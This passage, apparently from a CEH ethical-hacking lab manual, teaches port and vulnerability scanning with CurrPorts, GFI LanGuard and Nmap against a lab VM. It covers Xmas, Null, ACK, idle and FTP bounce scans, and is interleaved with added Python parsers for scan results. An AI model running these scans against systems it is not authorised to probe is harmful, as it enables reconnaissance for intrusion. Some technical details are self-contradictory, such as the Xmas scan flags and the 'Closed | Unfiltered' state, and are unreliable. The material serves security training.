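from dataclasses import dataclass

COLUMNS = ["Process Name", "Process ID", "Protocol", "Local Port",
           "Local Port Name", "Local Address", "Remote Port",
           "Remote Port Name", "Remote Address", "Remote Host Name", "State"]

# Constructed sample export: values modelled on the figures in this lab,
# plus one UDP DNS row so that a UDP filter has something to match.
SAMPLE_EXPORT = "\n".join([
    "\t".join(COLUMNS),
    "chrome.exe\t2988\tTCP\t4119\t\t10.0.0.7\t80\thttp\t173.194.36.26\tbom04s01-in-f26.1e100.net\tEstablished",
    "firefox.exe\t1368\tTCP\t4163\t\t10.0.0.7\t443\thttps\t173.194.36.15\tbom04s01-in-f15.1e100.net\tEstablished",
    "svchost.exe\t1012\tUDP\t52000\t\t10.0.0.7\t53\tdomain\t10.0.0.1\t\t",
    "httpd.exe\t1800\tTCP\t1070\t\t0.0.0.0\t\t\t\t\tListening",
    "lsass.exe\t564\tTCP\t1028\t\t0.0.0.0\t\t\t\t\tListening",
])


@dataclass
class Conn:
    process: str
    pid: int
    protocol: str      # "TCP" or "UDP"
    local_addr: str
    local_port: int
    remote_addr: str   # empty for listening sockets
    remote_port: int   # 0 when the export field is empty
    state: str


def _int(value: str) -> int:
    return int(value) if value.strip() else 0


def parse_export(text: str) -> list:
    """Parse a tab-delimited export whose first line is the column header."""
    lines = text.strip("\n").splitlines()
    header = lines[0].split("\t")
    conns = []
    for line in lines[1:]:
        f = dict(zip(header, line.split("\t")))
        conns.append(Conn(
            process=f.get("Process Name", ""),
            pid=_int(f.get("Process ID", "")),
            protocol=f.get("Protocol", "").upper(),
            local_addr=f.get("Local Address", ""),
            local_port=_int(f.get("Local Port", "")),
            remote_addr=f.get("Remote Address", ""),
            remote_port=_int(f.get("Remote Port", "")),
            state=f.get("State", ""),
        ))
    return conns


@dataclass
class Filter:
    include: bool
    side: str   # local | remote | both | process
    proto: str  # tcp | udp | tcpudp
    spec: str   # "80", "80-90", "10.0.0.1-10.0.0.255", or a process name


def parse_filters(text: str) -> list:
    """Split on spaces, semicolons or line breaks, as the filter dialog allows."""
    filters = []
    for token in re.split(r"[\s;]+", text.strip()):
        if not token:
            continue
        action, side, proto, spec = token.split(":", 3)
        action, side, proto = action.lower(), side.lower(), proto.lower()
        if (action not in ("include", "exclude")
                or side not in ("local", "remote", "both", "process")
                or proto not in ("tcp", "udp", "tcpudp")):
            raise ValueError(f"bad filter string: {token!r}")
        filters.append(Filter(action == "include", side, proto, spec))
    return filters


def _in_range(spec: str, addr: str, port: int) -> bool:
    """True if the port ('80-90') or IPv4 address ('10.0.0.1-10.0.0.9')
    falls inside spec; a single value is treated as a range of one."""
    lo, _, hi = spec.partition("-")
    hi = hi or lo
    if "." in lo:                      # IPv4 range; skip rows with no address
        if not addr:
            return False
        a = int(ipaddress.ip_address(addr))
        return int(ipaddress.ip_address(lo)) <= a <= int(ipaddress.ip_address(hi))
    return int(lo) <= port <= int(hi)  # port range


def matches(f: Filter, c: Conn) -> bool:
    if f.proto != "tcpudp" and c.protocol.lower() != f.proto:
        return False
    if f.side == "process":
        return c.process.lower() == f.spec.lower()
    sides = []
    if f.side in ("local", "both"):
        sides.append((c.local_addr, c.local_port))
    if f.side in ("remote", "both"):
        sides.append((c.remote_addr, c.remote_port))
    return any(_in_range(f.spec, addr, port) for addr, port in sides)


def apply_filters(conns: list, filter_text: str) -> list:
    """Return the rows CurrPorts would display for the given filter strings."""
    filters = parse_filters(filter_text)
    includes = [f for f in filters if f.include]
    excludes = [f for f in filters if not f.include]
    shown = []
    for c in conns:
        if includes and not any(matches(f, c) for f in includes):
            continue
        if any(matches(f, c) for f in excludes):
            continue
        shown.append(c)
    return shown


if __name__ == "__main__":
    conns = parse_export(SAMPLE_EXPORT)
    # Question 1: remote TCP port 80 and UDP port 53 only.
    for c in apply_filters(conns, "include:remote:tcp:80 include:remote:udp:53"):
        print(c.process, c.protocol, c.local_port, "->", c.remote_addr, c.remote_port)
    # Question 2: only the Firefox browser's ports.
    for c in apply_filters(conns, "include:process:tcpudp:firefox.exe"):
        print(c.process, c.protocol, c.local_port, c.state)
```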
Internet Connection Required: ☐ Yes ☑ No
Platform Supported: ☑ Classroom ☑ iLabs
CurrPorts allows you to easily translate all menus, dialog boxes, and strings into other languages.
Lab
Scanning for Network Vulnerabilities Using the GFI LanGuard 2012
GFI LANguard scans networks and ports to detect, assess, and correct any security vulnerabilities that are found.
Lab Scenario
You have learned in the previous lab to monitor TCP/IP and UDP ports on your local computer or network using CurrPorts. That tool automatically marks in pink suspicious TCP/UDP ports owned by unidentified applications. To prevent attacks pertaining to TCP/IP, you can select one or more items and then close the selected connections.
Your company's web server is hosted by a large ISP and is well protected behind a firewall. Your company needs to audit the defenses used by the ISP. After starting a scan, a serious vulnerability was identified but not immediately corrected by the ISP. An evil attacker uses this vulnerability and places a backdoor on the server. Using the backdoor, the attacker gets complete access to the server and is able to manipulate the information on the server. The attacker also uses the server to leapfrog and attack other servers on the ISP network from this compromised one.
As a security administrator and penetration tester for your company, you need to conduct penetration testing in order to determine the list of threats and vulnerabilities to the network infrastructure you manage. In this lab, you will be using GFI LanGuard 2012 to scan your network to look for vulnerabilities.
Lab Objectives
The objective of this lab is to help students conduct vulnerability scanning, patch management, and network auditing.
In this lab, you need to:
■ Perform a vulnerability scan
Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks
■ Audit the network
■ Detect vulnerable ports
■ Identify security vulnerabilities
■ Correct security vulnerabilities with remedial action
Lab Environment
To perform the lab, you need:
■ GFI LanGuard located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Vulnerability Scanning Tools\GFI LanGuard
■ You can also download the latest version of GFI LanGuard from the link http://www.gfi.com/lannetscan
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ A computer running Windows Server 2012 as the host machine
■ Windows Server 2008 running in a virtual machine
■ Microsoft .NET Framework 2.0
■ Administrator privileges to run the GFI LANguard Network Security Scanner
■ It requires the user to register on the GFI website http://www.gfi.com/lannetscan to get a license key
■ Complete the subscription and get an activation code; the user will receive an email that contains an activation code
Lab Duration
Time: 10 Minutes
Overview of Scanning Networks
As an administrator, you often have to deal separately with problems related to vulnerability issues, patch management, and network auditing. It is your responsibility to address all the vulnerability management needs and act as a virtual consultant to give a complete picture of a network setup, provide risk analysis, and maintain a secure and compliant network state faster and more effectively.
Security scans or audits enable you to identify and assess possible risks within a network. Auditing operations imply any type of checking performed during a network security audit. These include open port checks, missing Microsoft patches and vulnerabilities, service information, and user or process information.
You can download GFI LANguard from http://www.gfi.com.
GFI LANguard works on Microsoft Windows Server 2008 Standard/Enterprise, Windows Server 2003 Standard/Enterprise, Windows 7 Ultimate, Microsoft Small Business Server 2008 Standard, Small Business Server 2003 (SP1), and Small Business Server 2000 (SP2).
GFI LANguard includes default configuration settings that allow you to run immediate scans soon after the installation is complete.
Lab Tasks
Follow the wizard-driven installation steps to install the GFI LANguard network scanner on the Windows Server 2012 host machine.
1. Navigate to Windows Server 2012 and launch the Start menu by hovering the mouse cursor in the lower-left corner of the desktop.
FIGURE 5.1: Windows Server 2012 - Desktop view
2. Click the GFI LanGuard 2012 app to open the GFI LanGuard 2012 window.
FIGURE 5.2: Windows Server 2012 - Apps
3. The GFI LanGuard 2012 main window appears and displays the Network Audit tab contents.
TASK 1: Scanning for Vulnerabilities
The Zenmap installer installs the following files:
■ Nmap Core Files
■ Nmap Path
■ WinPcap 4.1.1
■ Network Interface Import
■ Zenmap (GUI frontend)
■ Ncat (Modern Netcat)
■ Ndiff
To execute a scan successfully, GFI LANguard must remotely log on to target computers with administrator privileges.
The default scanning options, which provide quick access to the scanning modes, are:
■ Quick scan
■ Full scan
■ Launch a custom scan
■ Set up a schedule scan
FIGURE 5.3: The GFI LANguard main window
4. Click the Launch a Scan option to perform a network scan.
FIGURE 5.4: The GFI LANguard main window indicating the Launch a Custom Scan option
5. The Launch a New Scan window appears.
i. In the Scan Target option, select localhost from the drop-down list
ii. In the Profile option, select Full Scan from the drop-down list
iii. In the Credentials option, select currently logged on user from the drop-down list
6. Click Scan.
Custom scans are recommended:
■ When performing a one-time scan with particular scanning parameters/profiles
■ When performing a scan for particular network threats and/or system information
■ To perform a target computer scan using a specific scan profile
^ If intrusion detection software (IDS) is running during scans, GFI LANguard sets off a multitude of IDS warnings and intrusion alerts in these applications.
FIGURE 5.5: Selecting an option for network scanning
7. Scanning starts; it will take some time to scan the network. See the following figure.
For large network environments, a Microsoft SQL Server/MSDE database backend is recommended instead of the Microsoft Access database.
Quick scans have relatively short scan durations compared to full scans, mainly because quick scans perform vulnerability checks on only a subset of the entire database. It is recommended to run a quick scan at least once a week.
8. After the scan completes, the scan result is shown in the left panel.
FIGURE 5.7: The GFI LanGuard custom scan wizard
9. To check the Scan Results Overview, click the IP address of the machine in the right panel.
10. It shows the Vulnerability Assessment and Network & Software Audit entries; click Vulnerability Assessment.
FIGURE 5.8: Selecting Vulnerability Assessment option
Types of scans:
■ Scan a single computer: Select this option to scan a local host or one specific computer.
■ Scan a range of computers: Select this option to scan a number of computers defined through an IP range.
■ Scan a list of computers: Select this option to import a list of targets from a file or to select targets from a network list.
■ Scan computers in text file: Select this option to scan targets enumerated in a specific text file.
■ Scan a domain or workgroup: Select this option to scan all targets connected to a domain or workgroup.
11. It shows all the Vulnerability Assessment indicators by category
During a full scan, GFI LANguard scans target computers to retrieve setup information and identify all security vulnerabilities, including:
■ Missing Microsoft updates
■ System software information, including unauthorized applications, incorrect antivirus settings and outdated signatures
■ System hardware information, including connected modems and USB devices
FIGURE 5.9: List of Vulnerability Assessment categories
12. Click Network & Software Audit in the right panel, and then click System Patching Status, which shows all the system patching statuses
FIGURE 5.10: System patching status report
13. Click Ports, and under this, click Open TCP Ports
Due to the large amount of information retrieved from scanned targets, full scans often tend to be lengthy. It is recommended to run a full scan at least once every 2 weeks.
FIGURE 5.11: TCP/UDP Ports result
14. Click System Information in the right side panel; it shows all the details of the system information
A custom scan is a network audit based on parameters, which you configure on the fly before launching the scanning process. Various parameters can be customized during this type of scan, including:
■ Type of scanning profile (i.e., the type of checks to execute/type of data to retrieve)
■ Scan targets
■ Logon credentials
15. Click Password Policy
FIGURE 5.12: Information of Password Policy
16. Click Groups: it shows all the groups present in the system
The next job after a network security scan is to identify which areas and systems require your immediate attention. Do this by analyzing and correctly interpreting the information collected and generated during a network security scan.
FIGURE 5.13: Information of Groups
17. Click the Dashboard tab: it shows all the scanned network information
FIGURE 5.14: Scanned report of the network
Lab Analysis
Document all the results, threats, and vulnerabilities discovered during the scanning and auditing process.
A high vulnerability level is the result of vulnerabilities or missing patches whose average severity is categorized as high.
A scheduled scan is a network audit scheduled to run automatically on a specific date/time and at a specific frequency. Scheduled scans can be set to execute once or periodically.
It is recommended to use scheduled scans:
■ To perform periodical/regular network vulnerability scans automatically, using the same scanning profiles and parameters
■ To trigger scans automatically after office hours and to generate alerts and auto-distribution of scan results via email
■ To automatically trigger auto-remediation options (e.g., auto download and deploy missing updates)
Tool/Utility         Information Collected/Objectives Achieved
GFI LanGuard 2012    ■ Vulnerability Level
                     ■ Vulnerability Assessment
                     ■ System Patching Status
                     ■ Scan Results Details for Open TCP Ports
                     ■ Scan Results Details for Password Policy
                     ■ Dashboard - Entire Network: Vulnerability Level, Security Sensors, Most Vulnerable Computers, Agent Status, Vulnerability Trend Over Time, Computer Vulnerability Distribution, Computers by Operating System
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Questions
1. Analyze how GFI LANguard products provide protection against a worm.
2. Evaluate under what circumstances GFI LANguard displays a dialog during patch deployment.
3. Can you change the message displayed when GFI LANguard is performing administrative tasks? If yes, how?
Internet Connection Required: ☐ Yes ☑ No
Platform Supported: ☑ Classroom ☑ iLabs
Exploring and Auditing a Network Using Nmap
Nmap (Zenmap is the official Nmap GUI) is a free, open source (license) utility for network exploration and security auditing.
Lab Scenario
In the previous lab you learned to use GFI LanGuard 2012 to scan a network to find out the vulnerability level, system patching status, details for open and closed ports, vulnerable computers, etc. An administrator and an attacker can use the same tools to fix or exploit a system. If an attacker gets to know all the information about vulnerable computers, they will immediately act to compromise those systems using reconnaissance techniques.
Therefore, as an administrator it is very important for you to patch those systems after you have determined all the vulnerabilities in a network, before the attacker audits the network to gain vulnerable information.
Also, as an ethical hacker and network administrator for your company, your job is to carry out daily security tasks, such as network inventory, service upgrade schedules, and the monitoring of host or service uptime. So, you will be guided in this lab to use Nmap to explore and audit a network.
Lab Objectives
The objective of this lab is to help students learn and understand how to perform a network inventory, manage services and upgrades, schedule network tasks, and monitor host or service uptime and downtime.
In this lab, you need to:
■ Scan TCP and UDP ports
■ Analyze host details and their topology
■ Determine the types of packet filters
ICON KEY
Valuable information
Test your knowledge
Web exercise
Workbook review
■ Record and save all scan reports
■ Compare saved results for suspicious ports
Lab Environment
To perform the lab, you need:
■ Nmap located at D:\CEH-Tools\CEH v8 Module 03 Scanning Networks\Scanning Tools\Nmap
■ You can also download the latest version of Nmap from the link http://nmap.org/
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ A computer running Windows Server 2012 as a host machine
■ Windows Server 2008 running on a virtual machine as a guest
■ A web browser with Internet access
■ Administrative privileges to run the Nmap tool
Lab Duration
Time: 20 Minutes
Overview of Network Scanning
Network addresses are scanned to determine:
■ What services (application names and versions) those hosts offer
■ What operating systems (and OS versions) they run
■ The type of packet filters/firewalls that are in use, and dozens of other characteristics
Tools demonstrated in this lab are available in D:\CEH-Tools\CEH v8 Module 03 Scanning Networks
Zenmap works on Windows, including Windows 7 and Server 2003/2008.
Lab Tasks
Follow the wizard-driven installation steps and install the Nmap (Zenmap) scanner on the host machine (Windows Server 2012).
1. Launch the Start menu by hovering the mouse cursor in the lower-left corner of the desktop
TASK 1: Intense Scan
FIGURE 6.1: Windows Server 2012—Desktop view
2. Click the Nmap-Zenmap GUI app to open the Zenmap window
The Zenmap installer installs the following files:
■ Nmap Core Files
■ Nmap Path
■ WinPcap 4.1.1
■ Network Interface Import
■ Zenmap (GUI frontend)
■ Ncat (Modern Netcat)
■ Ndiff
FIGURE 6.2: Windows Server 2012 - Apps
3. The Nmap - Zenmap GUI window appears.
Nmap Syntax: nmap [Scan Type(s)] [Options] {target specification}
FIGURE 6.3: The Zenmap main window
In port scan techniques, only one method may be used at a time, except that UDP scan (-sU) and any one of the SCTP scan types (-sY, -sZ) may be combined with any one of the TCP scan types.
4. Enter the virtual machine Windows Server 2008 IP address (10.0.0.4) in the Target: text field. You are performing a network inventory for the virtual machine.
In this lab, the IP address would be 10.0.0.4; it will be different in your lab environment.
5. In the Profile: text field, select, from the drop-down list, the type of profile you want to scan.
6. In this lab, select Intense Scan.
7. Click Scan to start scanning the virtual machine.
FIGURE 6.4: The Zenmap main window with Target and Profile entered
8. Nmap scans the provided IP address with Intense scan and displays the scan result below the Nmap Output tab.
FIGURE 6.5: The Zenmap main window with the Nmap Output tab for Intense Scan
9. After the scan is complete, Nmap shows the scanned results.
While Nmap attempts to produce accurate results, keep in mind that all of its insights are based on packets returned by the target machines or the firewalls in front of them.
The six port states recognized by Nmap:
■ Open
■ Closed
■ Filtered
■ Unfiltered
■ Open | Filtered
■ Closed | Unfiltered
Nmap accepts multiple host specifications on the command line, and they don't need to be of the same type.
FIGURE 6.6: The Zenmap main window with the Nmap Output tab for Intense Scan
10. Click the Ports/Hosts tab to display more information on the scan results.
11. Nmap also displays the Port, Protocol, State, Service, and Version of the scan.
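The Port/Protocol/State/Service/Version rows on the Ports/Hosts tab are the same rows the Nmap Output text carries, and the lab objectives ask you to save scan reports and compare them for suspicious ports. The parser and diff below are an added example, not code from the manual or from Nmap/Zenmap (which ship their own Ndiff tool); the two scan texts, the altered follow-up scan and the allow-list are constructed.

```python
"""Parse the port table from Nmap's normal output and compare saved scans.

Added example for this lab, not part of the CEH manual or of Nmap/Zenmap.
The two scan texts below are constructed to look like the Nmap Output tab
for 'nmap -T4 -A -v 10.0.0.4'; the second one is altered to show a diff.
"""
import re
from dataclasses import dataclass

# One row of Nmap's "PORT STATE SERVICE VERSION" table, e.g.
#   5357/tcp  open  http  Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
PORT_LINE = re.compile(
    r"^(?P<port>\d{1,5})/(?P<proto>tcp|udp|sctp)\s+"
    r"(?P<state>open|closed|filtered|unfiltered|open\|filtered|closed\|unfiltered)\s+"
    r"(?P<service>\S+)(?:\s+(?P<version>.*))?$"
)


@dataclass(frozen=True)
class PortEntry:
    port: int
    proto: str
    state: str
    service: str
    version: str


def parse_nmap_output(text):
    """Return {(port, proto): PortEntry} for every port-table row in Nmap normal output.

    Banner, summary, MAC and NSE script lines ('|_http-title: ...') do not match
    the row pattern and are skipped.
    """
    entries = {}
    for raw in text.splitlines():
        m = PORT_LINE.match(raw.strip())
        if m:
            key = (int(m["port"]), m["proto"])
            entries[key] = PortEntry(key[0], key[1], m["state"], m["service"],
                                     (m["version"] or "").strip())
    return entries


def diff_scans(baseline, current):
    """Compare a saved scan with a new one: ports that appeared, vanished, or changed."""
    new = sorted(k for k in current if k not in baseline)
    gone = sorted(k for k in baseline if k not in current)
    changed = sorted(
        k for k in current if k in baseline
        and (baseline[k].state, baseline[k].service, baseline[k].version)
        != (current[k].state, current[k].service, current[k].version)
    )
    return {"new": new, "gone": gone, "changed": changed}


def unexpected_open_ports(scan, allowed):
    """Open ports not on the allow-list for this host's role (the 'suspicious' ones)."""
    return sorted(k for k, e in scan.items() if e.state == "open" and k not in allowed)


# Constructed sample: the port table this lab's intense scan of 10.0.0.4 shows.
BASELINE_SCAN = """\
Nmap scan report for 10.0.0.4
Host is up (0.00020s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn
445/tcp   open  netbios-ssn
5357/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-methods: No Allow or Public header in OPTIONS response (status code 503)
|_http-title: Service Unavailable
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
MAC Address: 00:15:5D:00:07:10 (Microsoft)
"""

# Constructed follow-up scan: one RPC port gone, 8080/tcp newly open, 5357 now filtered.
LATER_SCAN = BASELINE_SCAN.replace(
    "49156/tcp open  msrpc        Microsoft Windows RPC\n",
    "8080/tcp  open  http-proxy\n",
).replace("5357/tcp  open  http ", "5357/tcp  filtered http ")

# Constructed allow-list: what this Windows host is expected to expose.
WINDOWS_MEMBER_ALLOWED = {(135, "tcp"), (139, "tcp"), (445, "tcp"), (5357, "tcp")} | {
    (p, "tcp") for p in range(49152, 49157)
}

if __name__ == "__main__":
    before, after = parse_nmap_output(BASELINE_SCAN), parse_nmap_output(LATER_SCAN)
    print("baseline rows:", len(before))
    print("diff:", diff_scans(before, after))
    print("unexpected:", unexpected_open_ports(after, WINDOWS_MEMBER_ALLOWED))
```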
The options available to control target selection:
■ -iL <inputfilename>
■ -iR <num hosts>
■ --exclude <host1>[,<host2>[,...]]
■ --excludefile <exclude_file>
The following options control host discovery:
■ -sL (List Scan)
■ -sn (No port scan)
■ -Pn (No ping)
■ -PS <port list> (TCP SYN Ping)
■ -PA <port list> (TCP ACK Ping)
■ -PU <port list> (UDP Ping)
■ -PY <port list> (SCTP INIT Ping)
■ -PE; -PP; -PM (ICMP Ping Types)
■ -PO <protocol list> (IP Protocol Ping)
■ -PR (ARP Ping)
■ --traceroute (Trace path to host)
■ -n (No DNS resolution)
■ -R (DNS resolution for all targets)
■ --system-dns (Use system DNS resolver)
■ --dns-servers <server1>[,<server2>[,...]] (Servers to use for reverse DNS queries)
FIGURE 6.7: The Zenmap main window with the Ports/Hosts tab for Intense Scan
12. Click the Topology tab to view Nmap's topology for the provided IP address in the Intense scan Profile.
FIGURE 6.8: The Zenmap main window with Topology tab for Intense Scan
13. Click the Host Details tab to see the details of all hosts discovered during the intense scan profile.
FIGURE 6.9: The Zenmap main window with Host Details tab for Intense Scan
By default, Nmap performs a host discovery and then a port scan against each host it determines to be online.
By default, Nmap determines your DNS servers (for rDNS resolution) from your resolv.conf file (UNIX) or the Registry (Win32).
14. Click the Scans tab to see the scan details for the provided IP addresses.
FIGURE 6.10: The Zenmap main window with Scans tab for Intense Scan
15. Now, click the Services tab located in the right pane of the window. This tab displays the list of services.
16. Click the http service to list all the HTTP Hostnames/IP addresses, Ports, and their states (Open/Closed).
Nmap offers options for specifying which ports are scanned and whether the scan order is randomized or sequential.
In Nmap, option -p <port ranges> means scan only the specified ports.
In Nmap, option -F means fast (limited port) scan.
FIGURE 6.11: The Zenmap main window with Services option for Intense Scan
17. Click the msrpc service to list all the Microsoft Windows RPC services.
In Nmap, option --port-ratio <ratio> (a decimal number between 0 and 1) means scan all ports in the nmap-services file with a ratio greater than the one given. <ratio> must be between 0.0 and 1.1
FIGURE 6.12: The Zenmap main window with msrpc Service for Intense Scan
18. Click the netbios-ssn service to list all NetBIOS hostnames.
FIGURE 6.13: The Zenmap main window with netbios-ssn Service for Intense Scan
TASK 2: Xmas Scan
19. Xmas scan sends a TCP frame to a remote device with URG, ACK, RST, SYN, and FIN flags set. FIN scans work only with OS TCP/IP stacks developed according to RFC 793. The current version of Microsoft Windows is not supported.
In Nmap, option -r means don't randomize ports.
20. Now, to perform a Xmas Scan, you need to create a new profile. Click Profile > New Profile or Command (Ctrl+P)
Xmas scan (-sX) sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree.
The option --max-retries <numtries> specifies the maximum number of port scan probe retransmissions.
21. On the Profile tab, enter Xmas Scan in the Profile name text field.
The option --host-timeout <time> gives up on slow target hosts.
FIGURE 6.15: The Zenmap Profile Editor window with the Profile tab
22. Click the Scan tab, and select Xmas Tree scan (-sX) from the TCP scans: drop-down list.
FIGURE 6.16: The Zenmap Profile Editor window with the Scan tab
23. Select None in the Non-TCP scans: drop-down list and Aggressive (-T4) in the Timing template: list, and click Save Changes
FIGURE 6.17: The Zenmap Profile Editor window with the Scan tab
24. Enter the IP address in the Target: field, select the Xmas scan option from the Profile: field and click Scan.
UDP scan is activated with the -sU option. It can be combined with a TCP scan type such as SYN scan (-sS) to check both protocols during the same run.
Nmap detects rate limiting and slows down accordingly to avoid flooding the network with useless packets that the target machine drops.
You can speed up your UDP scans by scanning more hosts in parallel, doing a quick scan of just the popular ports first, scanning from behind the firewall, and using --host-timeout to skip slow hosts.
In Nmap, option -sY (SCTP INIT scan) is often referred to as half-open scanning, because you don't open a full SCTP association. You send an INIT chunk, as if you were going to open a real association, and then wait for a response.
FIGURE 6.18: The Zenmap main window with Target and Profile entered
25. Nmap scans the target IP address provided and displays the results on the Nmap Output tab.
FIGURE 6.19: The Zenmap main window with the Nmap Output tab (screenshot: Target 10.0.0.4, Profile Xmas Scan, Command nmap -sX -T4 -A -v 10.0.0.4; the Nmap Output tab reads as follows)

    Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-24
    NSE: Loaded 93 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating ARP Ping Scan at 16:29
    Scanning 10.0.0.4 [1 port]
    Completed ARP Ping Scan at 16:29, 0.15s elapsed (1 total hosts)
    Initiating Parallel DNS resolution of 1 host. at 16:29
    Completed Parallel DNS resolution of 1 host. at 16:29, 0.00s elapsed
    Initiating XMAS Scan at 16:29
    Scanning 10.0.0.4 [1000 ports]
    Increasing send delay for 10.0.0.4 from 0 to 5 due to 34 out of 84 dropped probes since last increase.
    Completed XMAS Scan at 16:30, 8.36s elapsed (1000 total ports)
    Initiating Service scan at 16:30
    Initiating OS detection (try #1) against 10.0.0.4
    NSE: Script scanning 10.0.0.4.
    Initiating NSE at 16:30
    Completed NSE at 16:30, 0.00s elapsed
    Nmap scan report for 10.0.0.4
    Host is up (0.00020s latency).

When scanning systems compliant with this RFC text (RFC 793), any packet not containing SYN, RST, or ACK bits results in a returned RST if the port is closed, and no response at all if the port is open.

The option -sA (TCP ACK scan) is used to map out firewall rulesets, determining whether they are stateful or not and which ports are filtered.

26. Click the Services tab located at the right side of the pane. It displays all the services of that host.
FIGURE 6.20: The Zenmap main window with the Services tab (screenshot: the same Xmas scan output as Figure 6.19, with the Services tab selected at the right of the pane)

27. Null scan works only if the operating system's TCP/IP implementation is developed according to RFC 793. In a null scan, attackers send a TCP frame to a remote host with NO flags set.

28. To perform a null scan for a target IP address, create a new profile. Click Profile -> New Profile or Command (Ctrl+P).
FIGURE 6.21: The Zenmap main window with the New Profile or Command option (screenshot: the Profile menu open, showing New Profile or Command Ctrl+P and Edit Selected Profile Ctrl+E)
TASK 3
Null Scan
The Null Scan option (-sN) does not set any bits (the TCP flag header is 0).

The option -sZ (SCTP COOKIE ECHO scan) is a more advanced SCTP scan. It takes advantage of the fact that SCTP implementations should silently drop packets containing COOKIE ECHO chunks on open ports but send an ABORT if the port is closed.
29. On the Profile tab, input the profile name Null Scan in the Profile name text field.

FIGURE 6.22: The Zenmap Profile Editor with the Profile tab (screenshot: Profile name Null Scan; the help pane reads "This is how the profile will be identified in the drop-down combo box in the scan tab.")

The option -sI <zombie host>[:<probeport>] (idle scan) is an advanced scan method that allows for a truly blind TCP port scan of the target (meaning no packets are sent to the target from your real IP address). Instead, a unique side-channel attack exploits predictable IP fragmentation ID sequence generation on the zombie host to glean information about the open ports on the target.

30. Click the Scan tab in the Profile Editor window. Now select the Null Scan (-sN) option from the TCP scan: drop-down list.
FIGURE 6.23: The Zenmap Profile Editor with the Scan tab (screenshot: the TCP scan: drop-down list open, offering ACK scan (-sA), FIN scan (-sF), Maimon scan (-sM), Null scan (-sN), TCP SYN scan (-sS), TCP connect scan (-sT), Window scan (-sW) and Xmas Tree scan (-sX))

31. Select None from the Non-TCP scans: drop-down field and select Aggressive (-T4) from the Timing template: drop-down field.

32. Click Save Changes to save the newly created profile.
The option -b <FTP relay host> (FTP bounce scan) allows a user to connect to one FTP server and then ask that files be sent to a third-party server. Such a feature is ripe for abuse on many levels, so most servers have ceased supporting it.

The option -r (Don't randomize ports): by default, Nmap randomizes the scanned port order (except that certain commonly accessible ports are moved near the beginning for efficiency reasons). This randomization is normally desirable, but you can specify -r for sequential (sorted from lowest to highest) port scanning instead.
FIGURE 6.24: The Zenmap Profile Editor with the Scan tab (screenshot: Targets 10.0.0.4; TCP scan: Null scan (-sN); Non-TCP scans: None; Timing template: Aggressive (-T4); the help pane for Disable reverse DNS resolution reads "Never do reverse DNS. This can slash scanning times.")

33. In the main window of Zenmap, enter the target IP address to scan, select the Null Scan profile from the Profile drop-down list, and then click Scan.
In Nmap, option --version-all (Try every single probe) is an alias for --version-intensity 9, ensuring that every single probe is attempted against each port.

The option --top-ports <n> scans the <n> highest-ratio ports found in the nmap-services file. <n> must be 1 or greater.
FIGURE 6.25: The Zenmap main window with Target and Profile entered (screenshot: Target 10.0.0.4; Profile Null Scan)

The option -sR (RPC scan) works in conjunction with the various port scan methods of Nmap. It takes all the TCP/UDP ports found open and floods them with SunRPC program NULL commands in an attempt to determine whether they are RPC ports, and if so, what program and version number they serve up.

34. Nmap scans the target IP address provided and displays results in the Nmap Output tab.
FIGURE 6.26: The Zenmap main window with the Nmap Output tab (screenshot: Target 10.0.0.4, Profile Null Scan, Command nmap -sN -T4 -A -v 10.0.0.4; the Nmap Output tab reads as follows)

    Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-24
    NSE: Loaded 93 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating ARP Ping Scan at 16:47
    Scanning 10.0.0.4 [1 port]
    Completed ARP Ping Scan at 16:47, 0.14s elapsed (1 total hosts)
    Initiating Parallel DNS resolution of 1 host. at 16:47
    Completed Parallel DNS resolution of 1 host. at 16:47, 0.28s elapsed
    Initiating NULL Scan at 16:47
    Scanning 10.0.0.4 [1000 ports]
    Increasing send delay for 10.0.0.4 from 0 to 5 due to 68 out of 169 dropped probes since last increase.
    Completed NULL Scan at 16:47, 7.78s elapsed (1000 total ports)
    Initiating Service scan at 16:47
    Initiating OS detection (try #1) against 10.0.0.4
    NSE: Script scanning 10.0.0.4.
    Initiating NSE at 16:47
    Completed NSE at 16:47, 0.00s elapsed
    Nmap scan report for 10.0.0.4
    Host is up (0.000068s latency).

35. Click the Host Details tab to view the details of hosts, such as Host Status, Addresses, Open Ports, and Closed Ports.
FIGURE 6.27: The Zenmap main window with the Host Details tab (screenshot: Host Status State up; Open ports 0; Filtered ports 0; Closed ports 1000; Scanned ports 1000; Uptime Not available; Last boot Not available; Addresses IPv4 10.0.0.4, IPv6 Not available, MAC 00:15:5D:00:07:10)

36. Attackers send an ACK probe packet with a random sequence number. No response means the port is filtered, and an RST response means the port is not filtered.
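The RFC 793 reasoning behind the Xmas, Null and ACK scans above (closed ports answer RST, open ports stay silent, filtered ports answer nothing or with ICMP unreachable), written out as a port-state classifier plus the matching detection rule a defender would run over captured probes. This is an added example, not code from the lab manual or from Nmap; the Probe/Reply records and the sample traffic are constructed here.

```python
"""Added example (not part of the CEH lab manual or of Nmap): apply the RFC 793
reasoning behind Nmap's Xmas (-sX), Null (-sN), FIN (-sF) and ACK (-sA) scans
to probe/response pairs, and flag such probes from the defender's side.
All packets are constructed in-line; nothing is sent on the network."""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional

# TCP control bits as laid out in the RFC 793 header.
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20
XMAS_FLAGS = FIN | PSH | URG   # what -sX sends ("lights up" FIN, PSH and URG)
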